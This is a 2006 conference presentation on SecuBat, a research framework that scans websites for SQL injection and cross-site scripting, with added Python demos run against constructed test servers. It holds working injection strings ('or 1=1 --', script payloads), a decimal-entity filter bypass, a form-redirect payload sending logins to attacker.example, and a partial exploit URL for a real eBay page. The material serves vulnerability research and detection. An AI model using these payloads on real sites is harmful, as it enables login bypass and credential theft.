SecuBat Presentation - WWW2006


SecuBat: An Automated Web Vulnerability Detection Framework

Stefan Kals, Engin Kirda, Christopher Kruegel and Nenad Jovanovic

Secure Systems Lab, Vienna University of Technology, Austria



2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

2

Outline


Motivation


Problem Definition


Typical Vulnerabilities


Automated Attack & Analysis Concepts


SecuBat Implementation


Related Tools


Prototype Results


Findings & Case Study


Motivation


Rapidly increasing number of web applications

Developers lack awareness of typical vulnerabilities

The "Why me?" belief (nobody would bother attacking my site)

Manual vulnerability checking is labour-intensive

An automated tool would address these problems and raise the security level



Problem Definition


Demonstrate how easily an attacker can find soft targets on the web if web vulnerabilities are not fixed

Implement a crawling engine for collecting potential targets

Find generic, automatically executable attack techniques for the chosen vulnerability classes (SQL Injection, Cross-Site Scripting)

Find suitable techniques for analysing the responses

Assemble these parts into a pluggable vulnerability analysis and detection framework


Typical Vulnerabilities 1/2


SQL Injection

Problem: user input is placed into a database query without validation or escaping

Dynamically built SQL query:

q = "select * from user where mail='" + mail + "' and pw='" + pw + "'"

Enter values using SQL syntax:

mail:     ' or 1=1 --
password: ' or 1=1 --

Query has changed its semantics:

q = "select * from user where mail='' or 1=1 --' and pw='' or 1=1 --'"

Effective query (everything after -- is a comment, and 1=1 is always true):

q = "select * from user"

The where clause no longer restricts the result, so the login succeeds without valid credentials. (On MySQL the comment marker needs a trailing space, "-- ".)
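The login query above, run against a constructed in-memory SQLite table, as an added example that is not part of the original slides. It shows the slide's input turning the concatenated query into one that returns every row, the single-quote probe that SecuBat's attack module sends (next slides) producing a database error, and the parameterized query that closes the hole. The table contents and function names are my own; SQLite accepts "--" without a trailing space, whereas MySQL requires "-- ".

```python
import sqlite3


def make_db():
    """Constructed in-memory user table standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table user (mail text, pw text)")
    conn.executemany("insert into user values (?, ?)",
                     [("alice@example.org", "s3cret"), ("bob@example.org", "hunter2")])
    conn.commit()
    return conn


def built_query(mail, pw):
    """The literal SQL text the vulnerable login builds, exactly as on the slide."""
    return "select * from user where mail='" + mail + "' and pw='" + pw + "'"


def login_vulnerable(conn, mail, pw):
    """String concatenation: the user's input becomes part of the SQL syntax."""
    return conn.execute(built_query(mail, pw)).fetchall()


def login_parameterized(conn, mail, pw):
    """Fix: the driver binds the values, so they can never alter the query structure."""
    q = "select * from user where mail=? and pw=?"
    return conn.execute(q, (mail, pw)).fetchall()


def probe_causes_error(conn, mail="'"):
    """Send SecuBat's single-quote probe; True if the database rejects the query
    (the unbalanced quote is what the keyword analysis later looks for)."""
    try:
        login_vulnerable(conn, mail, "")
        return False
    except sqlite3.OperationalError:
        return True


INJECTION = "' or 1=1 --"   # the value from the slide, entered in both fields

if __name__ == "__main__":
    db = make_db()
    print(built_query(INJECTION, INJECTION))
    print("vulnerable:    ", login_vulnerable(db, INJECTION, INJECTION))     # every row
    print("parameterized: ", login_parameterized(db, INJECTION, INJECTION))  # no row
    print("probe error:   ", probe_causes_error(db))
```

The parameterized version still returns the right row for valid credentials; the injected string simply becomes a mail address that matches nothing.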


Typical Vulnerabilities 2/2 - Cross-Site Scripting

Attacker injects HTML/JavaScript that is displayed and executed in the victim's browser

Reflected vs. Stored XSS

Theft of user data (cookies, credentials, ...)

Example: redirecting a login form to the attacker's web server

Create exploit URLs and use them in authentic-looking phishing e-mails


Attack & Analysis Concepts 1/4 - General

Open framework for easily implementing and adding new attacks

Attack & Analysis modules (black box: only HTTP requests and responses are observed)

Runtime-configurable plugins

Common crawling and attacking APIs

Analysis results stored in a database


Attack & Analysis Concepts 2/4 - SQL Injection

1. Attack module prepares a new attack and sends it to the server (e.g. a single quote in a form field)

2. Server sends back a response page

3. Analysis module parses the response for keywords and builds a summary confidence factor

Figure: Attacker PC -> (1) attack request -> Web Server; (2) response page back to the Attacker PC; (3) response matched against the keyword list.

Keyword list (keyword, confidence in %):

  MySQL                 40
  Server Error          75
  java.lang             60
  Exception occurred    85
  ...

Query on the server after the single-quote probe (the extra quote leaves the string literal unbalanced, so the database rejects the query and a careless page echoes the error):

q = "select * from user where mail='''"
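The keyword-scoring step of the analysis module, as an added example rather than SecuBat's own C# code. The keyword list and confidences are the ones on the slide; the combination rule (treating the factors as independent probabilities) and the baseline comparison that discards keywords already present on the un-attacked page are my assumptions, as is the fake server standing in for the target.

```python
import re

# Keyword list and per-keyword confidence (percent) as shown on the slide; the
# regex spelling (case-insensitive, whitespace-tolerant) is my assumption.
KEYWORDS = [
    ("MySQL", r"MySQL", 40),
    ("Server Error", r"Server\s+Error", 75),
    ("java.lang", r"java\.lang", 60),
    ("Exception occurred", r"Exception\s+occurred", 85),
]

PROBE = "'"   # the single quote the attack module injects into one field at a time


def keyword_hits(page):
    """Keywords (name, confidence) found in a response page."""
    return [(name, c) for name, rx, c in KEYWORDS if re.search(rx, page, re.IGNORECASE)]


def summary_confidence(hits):
    """Combine per-keyword confidences into one factor. The slide does not give the
    formula; here the factors are treated as independent probabilities and combined
    as 1 - prod(1 - p), so several weak hints add up but never exceed 100."""
    miss = 1.0
    for _, c in hits:
        miss *= 1 - c / 100
    return round((1 - miss) * 100)


def scan_form(send, fields):
    """Attack each field of a form with the probe and score the response.
    `send(values)` submits the form and returns the response HTML.
    Keywords that already occur in the un-attacked page (e.g. 'Powered by MySQL')
    are ignored so they do not produce a false positive."""
    baseline = {name for name, _ in keyword_hits(send(dict(fields)))}
    results = {}
    for name in fields:
        values = dict(fields)
        values[name] = PROBE
        hits = [(kw, c) for kw, c in keyword_hits(send(values)) if kw not in baseline]
        results[name] = (summary_confidence(hits), [kw for kw, _ in hits])
    return results


# Constructed stand-in for the target: a login form whose "mail" field ends up
# unescaped in a query, while "pw" is handled safely. Every page carries a
# "Powered by MySQL" footer, which must not count as evidence.
def fake_login_server(values):
    if "'" in values.get("mail", ""):
        return ("<html><body><h1>Server Error</h1><pre>Exception occurred: "
                "You have an error in your SQL syntax near ''''</pre>"
                "<p>Powered by MySQL</p></body></html>")
    return "<html><body><p>Invalid login.</p><p>Powered by MySQL</p></body></html>"


if __name__ == "__main__":
    for field, (conf, kws) in scan_form(fake_login_server, {"mail": "", "pw": ""}).items():
        print(f"{field}: confidence {conf}% {kws}")
```

Without the baseline step the footer alone would give every field a 40% score; with it, only the two keywords that appear because of the probe contribute.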


Attack & Analysis Concepts 3/4 - XSS Attack

1. Attack module prepares a new attack and sends it to the server (e.g. JavaScript that shows a message box)

2. Server sends back a response page

3. Analysis module parses the response, checking for the occurrence of the injected string (and whether it would be executed, i.e. reflected as markup rather than HTML-escaped)

Figure: Attacker PC -> (1) attack request -> Web Server; (2) response page back to the Attacker PC; (3) response searched for the injected HTML.

Example reflection in the response page:

You searched for: <b><script>alert('XSS');</script></b> ...

Attack & Analysis Concepts 4/4 - Enhanced Attacks

Enhanced XSS attack

  Uses decimal HTML encoding to bypass input filters

  Replaces characters, e.g. ' => &#39;

  (Browsers decode such entities in text and attribute values, not inside a <script> element, so the encoded payload has to land in a context where it is decoded)

Form-Redirecting XSS scenario

  Checks for potential assets (stealable credentials, i.e. login forms)

  Uses an encoded injection string that redirects the found login form to the "attacker's server"

  Simulates a real XSS attack instead of only checking input validation
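The three XSS checks of the two preceding slides (reflection test, decimal-encoded variant, form-redirecting scenario with asset detection) as an added example, not SecuBat's own code. The simple payload is the slide's; the encoded variant is placed in an event-handler attribute (my choice, so that the browser decodes the entities); the attacker URL, the stand-in search page with its naive quote-stripping filter and its login form are constructed.

```python
import html
from html.parser import HTMLParser

SIMPLE_XSS = "<script>alert('XSS')</script>"   # payload from the slide


def decimal_encode(text, chars="'"):
    """Enhanced attack: replace filter-sensitive characters by decimal HTML
    entities, e.g. ' -> &#39; (the slide's example). `chars` selects which ones."""
    return "".join(f"&#{ord(c)};" if c in chars else c for c in text)


# Encoded payload in an attribute value, where &#39; is decoded before the JS runs.
ENHANCED_XSS = '<img src=x onerror="' + decimal_encode("alert('XSS')") + '">'


def form_redirect_payload(attacker_url):
    """Form-redirecting scenario: point every form on the page at the attacker's
    server (placeholder URL), with quotes encoded as in the enhanced attack."""
    js = f"for(var f of document.forms){{f.action='{attacker_url}'}}"
    return '<img src=x onerror="' + decimal_encode(js) + '">'


def reflection_status(response, payload):
    """How the server echoed the payload:
    'raw'        - present byte for byte, so the browser parses it as markup
    'escaped'    - present only after HTML-unescaping, i.e. neutralised (&lt;script&gt;)
    'not intact' - filtered, mangled or not reflected at all"""
    if payload in response:
        return "raw"
    if payload in html.unescape(response):
        return "escaped"
    return "not intact"


class LoginFormFinder(HTMLParser):
    """Asset check: collect the action of every <form> holding a password input."""
    def __init__(self):
        super().__init__()
        self.actions = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "login": False}
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["login"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            if self._form["login"]:
                self.actions.append(self._form["action"])
            self._form = None


def find_login_forms(page):
    finder = LoginFormFinder()
    finder.feed(page)
    finder.close()
    return finder.actions


def run_xss_checks(reflect, attacker_url="http://attacker.example/"):
    """Run the simple, enhanced and form-redirecting attacks against `reflect`,
    a function that submits the search string and returns the response page."""
    report = {
        "simple": reflection_status(reflect(SIMPLE_XSS), SIMPLE_XSS),
        "enhanced": reflection_status(reflect(ENHANCED_XSS), ENHANCED_XSS),
        "login_forms": find_login_forms(reflect("")),
    }
    if report["login_forms"]:
        p = form_redirect_payload(attacker_url)
        report["form_redirect"] = reflection_status(reflect(p), p)
    else:
        report["form_redirect"] = "no login form, nothing to redirect"
    return report


# Constructed target: echoes the search term into the page after stripping
# single quotes (a naive filter), and carries a login form.
def fake_search(term):
    return ('<html><body><form action="/login.php" method="post">'
            '<input name="u"><input type="password" name="p"></form>'
            '<p>You searched for: <b>' + term.replace("'", "") + '</b></p></body></html>')


if __name__ == "__main__":
    for k, v in run_xss_checks(fake_search).items():
        print(f"{k}: {v}")
```

Against the stand-in page the simple payload is mangled by the quote filter, while both encoded payloads come back byte for byte, which is exactly the filter bypass the enhanced attack is meant to detect.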


SecuBat Implementation 1/2


SecuBat Implementation 2/2

Implementation details

  Language: C#

  Data store: MS SQL database

Requirements

  MS Windows 2000, XP, 2003

  MS .NET Framework 2.0

  MS SQL Server 2000/2005 or MSDE/SQL Express 2005


Related Tools

Acunetix Web Vulnerability Scanner (commercial)

  + Web server technology detection

  + Application-level attacks: simple SQL injection, XSS

  - Closed source, no papers, no details available to the public

Nessus, Nikto

  - Rely on repositories of known vulnerabilities (signature-based, so flaws in custom-built applications are missed)

Nmap, Xprobe, ...

  - Port scanning / OS fingerprinting only

  - Network/OS level, no application-level attacks



Prototype Results

Evaluation run (targets collected via a Google search for "login"):

  25,064 crawled pages

  21,627 web forms

  4 attack types; share of forms reported vulnerable:

    SQL Injection:   6.63%
    Simple XSS:      4.30%
    Enhanced XSS:    5.60%
    Form-Red. XSS:   5.52%


Findings


Critical XSS vulnerabilities found (asset at risk):

  eBay (auction access)

  Austrian Finance Ministry (e-government access)

  Geizhals (price management)

  Crit.org (security-related content)

  Apple (developer access)


A Case Study


eBay.de Press

http://presse.ebay.de/news.exe?typ=SU&search=%68%74%74%70%3A%2F%2F%70%72%65%73%73%65%2E%65%62%61%79%2E%64%65%2F%26%71%75%6F%74%3B%3E...

The percent-encoded search parameter decodes to http://presse.ebay.de/&quot;>... : a legitimate-looking URL, an HTML-encoded double quote and a closing angle bracket, the typical prefix for breaking out of a reflected attribute value before the attacker's own markup follows.


Notifications


Recipients looked up via the WhoIs service

591 mails sent

306 bounced as "recipient unknown"

48 requests for details within 1 week


Conclusion


Increasing use of web technology needs an increasing security effort

Rather simple attacks (SQL Injection, XSS), yet many vulnerable web sites

An automated detection approach can increase your site's security

Implementation of an extensible (pluggable) analysis framework ("SecuBat")

First results of the prototype serve as a proof of concept



The End

http://www.secubat.org